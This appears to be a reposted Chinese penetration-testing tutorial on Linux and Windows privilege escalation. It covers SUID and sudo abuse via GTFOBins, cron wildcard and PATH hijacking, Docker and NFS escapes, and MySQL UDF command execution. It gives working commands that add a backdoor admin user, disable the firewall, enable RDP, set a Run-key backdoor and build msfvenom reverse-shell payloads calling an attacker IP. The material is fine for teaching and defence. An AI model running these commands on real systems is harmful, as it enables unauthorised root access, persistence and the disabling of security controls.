文章总结： 本文系统阐述Linux系统提权的核心方法论，涵盖提权动机、信息收集、内核漏洞利用、SUID滥用、计划任务配置不当、Docker组特权及敏感信息泄露等关键技术路径。重点解析SUID机制原理与GTFOBins实战利用，并提供自动化工具推荐及具体操作命令，具备较强实战指导价值。 综合评分： 85 文章分类： 渗透测试,红队,内网渗透,漏洞分析,实战经验

---

提权：Linux 与 Windows 提权方法论

原创

三呼呼 三呼呼

古月安全

2026年5月6日 09:54 四川

在小说阅读器读本章

去阅读

为什么要提权？

首先当我们rce之后，我们为什么要提权，提权的根本目的，是突破权限限制，获得对系统的最高控制权。具体动机包括：

1. 获取最高权限（root/Administrator/SYSTEM）

   只有获得最高权限，才能完全控制系统，执行所有操作，如安装软件、修改系统配置、读取任意文件、创建后门等。

2. 扩大攻击成果

   低权限账户往往只能访问有限的目录和文件，而 root 可以访问所有数据（如 /etc/shadow、数据库文件、其他用户的私密文档）。提权后能获取更多敏感信息，为后续攻击提供支撑。

3. 横向移动

   在拿下某台服务器后，攻击者往往需要以此为跳板进入内网其他机器。拥有 root 权限后，可以更方便地提取密码哈希、窃取票据、安装代理，从而在内网横向渗透。

4. 权限维持

   建立持久化后门通常需要高权限（如修改系统服务、添加 cron 任务、安装 rootkit）。只有提权成功，才能长期控制目标而不被轻易清除。

5. 绕过安全机制

   某些安全防护（如 SELinux、AppArmor）对低权限用户限制严格，但对 root 的限制相对宽松。提权后可关闭或绕过这些防御。

Linux 系统提权

Linux 提权的方法多种多样，但核心思路可归纳为三类：内核漏洞、配置错误、敏感信息泄露。

信息收集：提权的前提

在尝试任何提权方法前，必须先全面收集系统信息，找到可用的信息。常用命令：

# 系统版本、内核信息uname -acat /etc/issuecat /etc/os-release# 当前用户及权限idwhoamisudo -l                      # 查看 sudo 权限# 网络信息ifconfig / ip anetstat -anptss -tuln# 进程和服务ps auxps aux | grep root# 文件系统find / -perm -4000 -type f 2>/dev/null   # 查找 SUID 文件find / -writable -type f 2>/dev/null     # 查找可写文件ls -la /etc/cron*                         # 查看计划任务

或者使用自动化脚本能快速输出关键信息，比如：https://github.com/The-Z-Labs/linux-exploit-suggester

内核漏洞提权

原理：利用 Linux 内核的已知漏洞（如 Dirty Cow、Dirty Pipe、PwnKit 等）直接获得 root 权限。

适用场景：系统内核版本较老、未打补丁，通常是基于第一步的信息收集来进行

步骤：

1. 确定内核版本：uname -a
2. 使用 linux-exploit-suggester.sh 匹配可能的漏洞。
3. 查找对应漏洞的利用代码（因为版本较老，通常Metasploit中存在利用的exploit），上传至目标并编译执行。
4. 成功则获得 root shell。

比如

Dirty Pipe (CVE-2022-0847)：影响 Linux 5.8 及以上版本，可覆盖任意只读文件。

PwnKit (CVE-2021-4034)：影响所有主流发行版，利用 pkexec 提权，利用简单稳定

我们打开msf看一下：基本都是可以直接使用的

注意：内核漏洞利用可能导致系统崩溃或不可用，务必在测试环境验证后再用于真实目标。

SUID 滥用

原理：在 Linux 权限体系中，SUID（Set owner User ID）是一种特殊的文件权限位。当可执行文件设置了 SUID 位时，普通用户运行该文件时，进程的执行用户 ID（EUID）会临时切换为文件的所有者（通常是 root），而不是运行者本身的用户 ID。这一机制原本是为了让普通用户能够以特权身份执行某些必要的操作（例如passwd命令需要修改/etc/shadow文件，但普通用户无权直接写入该文件，通过 SUID 位，passwd可以临时获得 root 权限完成密码修改）。然而，如果 SUID 程序本身存在漏洞或功能允许执行任意命令，攻击者就可以利用它来获得 root 权限，这就是 SUID 提权的核心原理。

SUID 位的作用机制

• 普通文件权限由三组（所有者、所属组、其他用户）的读（r）、写（w）、执行（x）标志组成。
• SUID 位用 s 表示，出现在所有者执行权限的位置（例如 -rwsr-xr-x）。当文件具有该标志时，任何用户执行它，进程的有效用户 ID 都会被设置为文件所有者的 UID。
• 进程在运行时拥有真实用户 ID（RUID，即启动进程的用户）和有效用户 ID（EUID，用于权限检查）。内核根据 EUID 判断进程是否有权访问资源。
• 因此，如果一个 root 所有的程序设置了 SUID 位，普通用户执行它后，进程的 EUID 就变成 0（root），从而可以执行 root 权限的操作。

如下图所示：paswd就设置了suid，而其他文件就无该标识

如何发现系统中的 SUID 文件

提权的第一步是找到所有设置了 SUID 位的可执行文件。可以使用find命令递归搜索整个文件系统：

find / -perm -4000 -type f 2>/dev/null

• -perm -4000：匹配 SUID 位设置的文件（4000 是 SUID 的八进制表示）。
• -type f：只查找普通文件。
• 2>/dev/null：将错误信息（如权限不足的目录）重定向到空设备，避免输出干扰。

得到结果如下图：

此外，也可以检查特定目录，如/usr/bin、/usr/sbin、/bin、/sbin等，因为这些是系统命令的常见位置。但是，为了全面覆盖，最好扫描整个根目录。得到 SUID 文件列表后，需要逐一分析哪些可以被当前用户利用。通常，我们需要关注那些能够执行系统命令、读取/写入文件、或具有交互式 shell 功能的程序。

SUID 提权的常见利用方式

当一个 SUID 程序被滥用时，通常是因为它允许用户通过某些选项或功能来执行外部命令、修改文件或启动子进程。下面列举一些典型的例子，并说明利用方法。

利用：参考https://gtfobins.github.io/，它收录了各种可被利用的 SUID 程序。常见的比如：

find

find命令用于搜索文件，它有一个-exec选项，可以对找到的每个文件执行指定的命令。如果find设置了SUID root ，那么通过-exec执行的命令也会以 root 权限运行。比如下面这样：直接变root

find /tmp -exec /bin/sh -p \; -quit

• -p选项是为了让 bash 以特权模式运行，否则 bash 可能会放弃有效权限（某些 shell 在检测到 EUID ≠ RUID 时会主动降权）。不同的 shell 行为不同，具体可参考 GTFOBins。
• 如果 /bin/sh 是 bash 的符号链接，可能需要使用 bash -p。

另一种方式是利用find的-exec直接运行 shell：find . -exec /bin/bash -p \; -quit

vim/vi

vim通常不会默认设置 SUID，但如果管理员错误地给vim设置了 SUID 位，那么普通用户可以通过vim以 root 权限打开文件并执行 shell 命令。

通常是这样执行：vim -c ‘:!/bin/bash’

在 vim 中，:!可以执行外部命令。由于 vim 以 root 权限运行，执行/bin/bash将得到一个 root shell。

bash

如果bash本身设置了 SUID 位（非常罕见，因为危险），那么直接运行bash -p即可获得 root shell。

less/more

如果less或more是 SUID root 的，在浏览文件时可以通过!命令执行 shell。

less /etc/passwd# 在 less 中按 ! 然后输入 bash

cp/mv

如果cp或mv是 SUID，可以用来覆盖系统文件（如/etc/passwd、/etc/shadow）来创建新 root 用户，或修改/etc/sudoers。但这通常需要能够写入目标文件，且系统可能开启了文件系统保护（如不可变属性），但仍是潜在的提权途径。

awk

awk可以执行系统命令，如果它设置了 SUID ：

awk 'BEGIN {system("/bin/bash")}'

python/perl/ruby 等解释器

如果某个解释器被设置了 SUID，那么可以直接在脚本中执行系统调用获取 root shell。具体取决于版本和编译选项

环境变量劫持配合 SUID

如果 SUID 程序调用了外部程序但没有使用绝对路径，攻击者可以通过修改PATH环境变量来劫持该调用。例如，一个 SUID 脚本中执行了cp命令，我们可以创建一个恶意cp脚本放在PATH优先的目录中，当 SUID 程序运行时，它会执行我们的恶意脚本，并以 root 权限运行。这属于 SUID 环境变量劫持。

假设 SUID 程序/usr/local/bin/backup内容为cp /etc/passwd /tmp/，我们可以创建恶意CP

echo '#!/bin/bash' > /tmp/cpecho 'chmod u+s /bin/bash' >> /tmp/cpchmod +x /tmp/cpexport PATH=/tmp:$PATH/usr/local/bin/backup   # 运行后，实际执行的是 /tmp/cp 这时已经使用的我们自己的cp文件了，从而得到root权限的shell

在实践中，获得 SUID 文件列表后，可参考https://gtfobins.github.io/网站。该网站收集了大量 Unix 二进制文件的可利用方法，并按照功能分类（如 SUID、sudo、文件读取等）。只需在网站上搜索找到的 SUID 程序名，即可看到详细的利用命令。

SUID 提权是 Linux 渗透测试中最基础且最常用的技术之一。它利用了系统内置的特权分离机制，将程序所有者（通常是 root）的权限赋予普通用户。攻击者通过寻找不安全或配置错误的 SUID 程序，并结合其功能执行任意代码，从而获取 root 权限

计划任务 (Cron) 配置不当

原理：系统管理员可能设置了以 root 权限运行的定时任务，如果脚本或二进制文件可被低权限用户修改，则可植入恶意代码。

查看命令：

cat /etc/crontabls -la /etc/cron.d/ls -la /var/spool/cron/crontabs/

利用方式：

• 可写脚本：如果定时任务执行的脚本文件对当前用户可写， 直接写入 chmod u+s /bin/bash 或反弹 root shell。
• 通配符注入：原理：如果 root 用户的计划任务中执行了某条命令（如tar、chown、rsync），且该命令在运行时使用了通配符（例如*），攻击者可以利用这些命令的特性，通过创建特定名称的文件来注入额外的参数，从而执行任意命令

某个以 root 权限运行的定时任务脚本中，使用了类似tar czf /backup/*.tar.gz /home/user/*这样的语句。注意这里的/home/user/*使用了通配符。当定时任务执行tar命令时，/home/user/*会被展开成这两个文件名，并作为参数传递给tar。tar命令识别出–checkpoint和–checkpoint-action参数后，就会在归档到检查点时，以 root 权限执行指定的test.sh脚本。

Docker 组特权

原理：如果当前用户属于docker组，即可直接管理容器。通过挂载宿主机根目录，可逃逸到宿主机并获得 root 权限。

检查：groups | grep docker

利用：docker run -v /:/mnt -it alpine chroot /mnt /bin/bash

此时容器内/mnt即为宿主机根目录，chroot后获得宿主机 root shell。

密码与敏感信息泄露

原理：系统或应用程序的配置文件、备份文件、历史命令中可能包含明文密码或哈希。

常见检查点：

• /etc/shadow 是否可读？若可读，直接复制哈希破解。
• 历史命令：cat ~/.bash_history 可能包含管理员输入的命令，如 mysql -u root -p’password’。
• Web 配置文件：如 WordPress 的 wp-config.php 包含数据库密码。
• 备份文件：.bak、.old、.swp 等可能泄露敏感信息。

利用：将可读的/etc/shadow和/etc/passwd合并后用 John 或 hashcat 破解。

sudo命令的滥用

• 原理：sudo配置文件 /etc/sudoers如果允许普通用户以 root 权限执行某些特定命令（如 vim、less、tcpdump、apt等），而这些命令本身又有执行其他命令或读写任意文件的功能，就可以被用来提权。

• 利用条件：运行 sudo -l查看当前用户可以以 root 权限执行哪些命令。

• 常见利用方式：

• sudo vim：在 vim 中执行 :!/bin/bash。

• sudo less/sudo more：在查看文件时输入 !bash。

• sudo find：sudo find /tmp -exec /bin/bash \;。

• sudo tcpdump：利用 tcpdump的 postrotate-command选项。

• sudo apt：通过 apt 的 changelog命令调用外部 pager。

• sudo -u root /bin/bash：如果sudo -l的结果中包含 (ALL) ALL或类似条目，则可以直接执行sudo /bin/bash或sudo su-来切换 root

NFS 共享配置不当

• 原理：NFS (Network File System) 服务如果配置了 no_root_squash选项，当远程客户端以 root 用户身份挂载该共享目录时，在共享目录中创建的文件和目录将保留 root 的 UID (0)，而不是被映射为匿名用户。
• 利用条件：目标服务器通过 NFS 导出了一个目录，且该目录的导出选项包含 no_root_squash。攻击者需要有能挂载该 NFS 共享的客户端权限。
• 提权方式：

1. 在攻击者机器上（可以是一台低权限的跳板机，也可以是攻击者的物理机）以 root 权限（可以使用 sudo）挂载这个 NFS 共享

   mount -t nfs <target_ip>:/shared/dir&nbsp;/mnt/nfs

2. 在挂载的目录中，创建一个可执行文件（例如/bin/bash的副本），并设置其 SUID 位。

cp /bin/bash /mnt/nfs/rootshellchmod u+s /mnt/nfs/rootshell

3. 切换到目标机器上的低权限用户，进入 NFS 共享目录，执行这个设置了 SUID 位的文件，即可获得 root 权限的 shell

cd /shared/dir./rootshell -p

windows提权

UDF（用户自定义函数）提权

这是 MySQL 数据库中最经典的一种提权方式

核心原理

• 什么是 UDF：UDF (User Defined Function) 是 MySQL 的一个扩展接口，允许用户通过编写动态链接库（Windows 下为 .dll文件）来自定义函数，实现 MySQL 本身无法直接完成的功能 。
• 提权逻辑：如果攻击者拥有 MySQL 的 administrator账号权限，并且 MySQL 服务本身以较高权限（如 administrator）运行，那么攻击者就可以将预先编译好的、包含执行系统命令功能的 UDF 库文件导入到 MySQL 的插件目录，并通过 CREATE FUNCTION语句创建自定义函数（如 sys_eval、sys_exec、do_system等）。之后，在 MySQL 的 SQL 语句中调用这些函数，就能以 MySQL 服务进程的权限（通常是 administrator）在操作系统上执行系统命令，从而实现提权。

UDF 提权的必要条件

| 条件 | 说明 | 获取方式 | | — | — | — | | 拥有 MySQL root 权限 | 需要知道 root 账号的密码，或拥有具备INSERT/DELETE权限的高权限账户 | 通过已获取的 webshell 或弱口令爆破获得 | | MySQL 服务以高权限运行 | MySQL 服务进程需以 SYSTEM 或 Administrator 权限运行 | net user查看是否存在 mysql 用户（若存在则可能已降权） | | secure_file_priv 为空 | MySQL 文件读写权限限制必须关闭 | SHOW GLOBAL VARIABLES LIKE '%secure%';显示为空才可 | | 知道 MySQL 安装目录 | 需要找到lib\plugin目录位置 | SELECT @@basedir;或SHOW VARIABLES LIKE '%plugin%'; |

比如secure_file_priv 为空：

由于低权限用户可能无法在 MySQL 安装目录下直接创建文件夹，可以利用 Windows NTFS 文件系统的ADS（Alternate Data Stream，备用数据流）特性来绕过限制

-- 第一步：找到 MySQL 安装目录SELECT @@basedir;-- 假设返回：D:\mysql_5.7.44\-- 第二步：利用 NTFS ADS 创建 lib 目录SELECT 'aaa' INTO DUMPFILE 'D:\\mysql_5.7.44\\lib::$INDEX_ALLOCATION';-- 第三步：利用 NTFS ADS 创建 plugin 目录SELECT 'aaa' INTO DUMPFILE 'D:\\mysql_5.7.44\\lib\\plugin::$INDEX_ALLOCATION';

原理：::$INDEX_ALLOCATION是 NTFS 的目录创建流，当向该流写入数据时，系统会自动创建对应目录。执行成功后，lib\plugin目录就建立好了。

获取 UDF dll 文件

UDF 提权需要专门的.dll文件(windows)，Linux系统是.so文件，比如从Metasploit 获取：

当然sqlmap中也有，但是需要解码

将 dll 文件上传到目标服务器

通过已获取的 webshell（如蚁剑、哥斯拉）将udf.dll上传到目标服务器的一个可写目录，如C:\Windows\Temp\。

将 dll 移动到 MySQL 的 plugin 目录

利用 MySQL 的文件写入功能，将 dll 从临时目录移动到正确的 plugin 目录

-- 假设 dll 上传到了 C:\Windows\Temp\udf.dllSELECT LOAD_FILE('C:\\Windows\\Temp\\udf.dll') INTO DUMPFILE 'D:\\mysql_5.7.44\\lib\\plugin\\udf.dll';

创建自定义函数

-- 创建 sys_exec 函数（执行命令，返回退出码）CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.dll';-- 创建 sys_eval 函数（执行命令，返回输出结果，更方便）CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';-- 验证函数是否创建成功SELECT * FROM mysql.func;

最后执行系统命令提权

#

-- 查看当前权限（如果返回 SYSTEM 或 Administrator 则成功）SELECT sys_eval('whoami');-- 添加新管理员用户SELECT sys_eval('net user hacker 123456 /add');SELECT sys_eval('net localgroup administrators hacker /add');-- 开启远程桌面（3389）SELECT sys_eval('reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f');-- 关闭防火墙SELECT sys_eval('netsh advfirewall set allprofiles state off');

PostgreSQL 数据库 UDF 提权与 MySQL UDF 提权类似。PostgreSQL 也支持通过CREATE FUNCTION加载自定义的动态库（.so文件）来执行系统命令。

win内核漏洞提权

原理：利用 Windows 操作系统内核的已知漏洞，直接获得 SYSTEM 权限。这个就不多说了，跟系统版本和补丁相关

通常可以通过快速扫描获取对应的可用信息

比如收集系统信息

systeminfo   # 获取系统版本、补丁编号wmic qfe list brief   # 列出已安装补丁

匹配漏洞：手动对比已知漏洞（如 MS16-075、MS17-010、CVE-2019-0708 等）与补丁编号，或者使用自动化的工具进行皮匹配

使用自动化工具：https://github.com/mmioimm/windows-exploit-suggester/

或者msf中的模块。根据扫描结果，选择对应的利用工具即可。

未引用的服务路径（Unquoted Service Path）

原理：当服务的可执行文件路径包含空格且未被引号包围时，系统会按顺序尝试解析路径，可能导致执行攻击者放置的恶意程序。

检查

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

比如得到：

利用：

1. 找到存在漏洞的服务路径，例如 C:\Program Files\xxxx\xxxx\xxxx.exe。
2. 在第一个空格前创建恶意文件，例如 C:\Program.exe（需有写入权限）。
3. 重启服务（可能需要管理员权限触发，若当前用户无重启权限，则等待系统重启或服务自动重启）：

sc stop xxxx.exesc start xxxx.exe

恶意程序Program.exe将以 SYSTEM 权限执行。

可修改的服务二进制文件

原理：低权限用户对服务对应的 EXE 或 DLL 文件具有写入权限，可替换为恶意程序。

利用：生成恶意 payload（例如使用 msfvenom）：

msfvenom -p windows/x64/shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe-service -o xxxx.exe

将恶意文件复制到原服务路径并覆盖原文件即可。

可修改的服务注册表

原理：服务在注册表中的ImagePath键值可被低权限用户修改，指向恶意程序。

利用

reg add "HKLM\SYSTEM\CurrentControlSet\Services\xxxx" /v ImagePath /t REG_EXPAND_SZ /d "C:\evil.exe" /fsc stop xxxxsc start xxxx

弱权限服务（Services Permissions）

原理：普通用户对某个高权限运行的服务具有SERVICE_ALL_ACCESS权限，可以修改服务配置指定到恶意程序，然后启动。

利用

sc&nbsp;config <服务名> binPath=&nbsp;"C:\evil.exe"sc&nbsp;start&nbsp;<服务名>

计划任务

原理：以 SYSTEM 权限运行的定时任务，如果任务脚本或可执行文件可写，则可植入恶意代码。同linux系统，关注以 SYSTEM 运行的任务，检查其执行的程序路径是否可写。

利用：

1. 找到可写的任务脚本（如 C:\Scripts\backup.bat）。
2. 追加恶意命令

echo net user hacker password /add >> C:\Scripts\backup.batecho net localgroup administrators hacker /add >> C:\Scripts\backup.bat

3. 等待任务执行，或手动触发（如果权限允许），将得到一个administrators 组权限的hacker用户

注册表AlwaysInstallElevated

原理：当注册表项AlwaysInstallElevated设置为 1 时，普通用户也可以使用 SYSTEM 权限安装 MSI 包。

检查：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

若两个值均为 0x1，则可利用。

利用：

1. 使用 msfvenom 生成 MSI 包：bash

msfvenom -p windows/x64/shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f msi -o evil.msi

2. 上传到目标，以普通用户身份静默安装：cmd

msiexec /quiet /i evil.msi

3. 获得 SYSTEM 权限的 shell。

Windows 凭据管理器

检查凭证：cmdkey /list

利用：如果存在存储的凭据（如域管理员），可以使用runas以该凭据启动进程：

runas /savecred /user:domain\admin "cmd.exe"

Unattend 文件

检查：

dir C:\Windows\Panther\Unattend.xmldir C:\Windows\Panther\Unattend\Unattend.xmldir C:\Windows\System32\sysprep\sysprep.xml

提取密码：文件中可能存在UserPassword或AdministratorPassword的 Base64 编码密码，可直接解码。

注册表中的明文密码

通常使用工具查看

组策略首选项

原理：域控使用 GPP 存储的密码（如本地管理员密码）采用 AES-256 加密，但密钥已公开，可解密。

检查：查找Groups.xml文件：

dir /s *Groups.xml

解密：使用gpp-decrypt工具（Kali 自带）：

gpp-decrypt "加密的cpassword值"

令牌窃取与假冒

原理：窃取系统中已有的高权限访问令牌（如 SYSTEM 或域管理员），并用于创建新进程。

如使用Incognito（Metasploit）工具，或者JuicyPotato适用于 Windows 7/8/10/Server 2012/2016，通过 NTLM 中继获取 SYSTEM 令牌，若成功，可获得 SYSTEM 权限的 shell。

弱权限文件夹

原理：某些系统目录（如C:\Windows\System32）如果被错误配置为普通用户可写，可植入恶意文件。

检查：

icacls "C:\Windows\System32" | findstr "Users"

如果输出包含(CI)(OI)(W)或(CI)(OI)(M)表示可写。

利用：将恶意 EXE 或 DLL 写入该目录，并等待高权限进程调用。属于被动调用的方式

注册表自动运行键

原理：某些注册表位置（如Run、RunOnce）如果普通用户可写，可以添加恶意启动项，随系统启动执行。

检查：

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runreg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

利用：

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\evil.exe"

总结

以上仅是一些简单的思路，具体情况可根据目标系统的情况定，其核心是：

1. 信息收集是核心：使用 systeminfo、whoami /priv、net user、net localgroup等命令全面了解当前用户权限和系统配置。
2. 优先尝试“软”提权：服务配置错误、计划任务、AlwaysInstallElevated 等方法更稳定，不易导致蓝屏。
3. 利用自动化脚本：工具能快速枚举潜在漏洞，节省时间。
4. 注意权限维持：提权成功后，可添加用户、关闭防火墙、开启远程桌面，便于后续访问

总结与建议

Linux 提权方法繁多，成功的关键在于细致的信息收集和灵活的思维，提权不仅是技术对抗，更是对系统配置理解深度的体现。

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：古月安全 三呼呼 三呼呼《提权：Linux 与 Windows 提权方法论》